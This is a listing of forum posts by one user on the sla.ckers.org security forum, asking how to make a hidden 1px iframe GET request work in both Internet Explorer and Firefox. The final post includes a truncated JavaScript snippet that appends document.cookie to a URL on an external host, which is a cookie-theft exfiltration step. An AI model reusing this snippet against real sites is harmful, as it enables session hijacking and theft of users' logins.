Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 

Current Page: 1 of 1
Results 1 - 8 of 8
5 years ago
p0c
Can you provide an url?
Forum: SQL and Code Injection
5 years ago
p0c
Hmmz it was a stupid <enter> that caused the problems in IE :') Thanks for all your help Gareth Heyes / backbone, I really appreciate it!
Forum: CSRF and Session Info
5 years ago
p0c
Strange, I have no idea what I'm doing wrong then. There must be a difference between IE en FF, since most of these work only in FF..?
Forum: CSRF and Session Info
5 years ago
p0c
And once again only working in FF, not in IE.. :( Anyone another idea?
Forum: CSRF and Session Info
5 years ago
p0c
If there's another way to do this (load an iframe of 1px x 1px and do a GET to a external URL) that works in both IE and FF I'm also very satisfied.. ;)
Forum: CSRF and Session Info
5 years ago
p0c
Not working in IE and FF this time..
Forum: CSRF and Session Info
5 years ago
p0c
Thanks for your reply Gareth. Unfortunately this doesn't work either.. It does in FF, but not in IE.
Forum: CSRF and Session Info
5 years ago
p0c
Hey all, I finally got my dynamic Iframe creation working on FF, but I can't seem to figure out why this wont work on IE. Is anyone familiar with this, and does anyone know a workaround? I searched the forums, but couldn't find anything.. The script: var url = "http://site.com/script.php"; url = url + "?pew=" + document.cookie; var body = document.getElementsByTagNam
Forum: CSRF and Session Info
Current Page: 1 of 1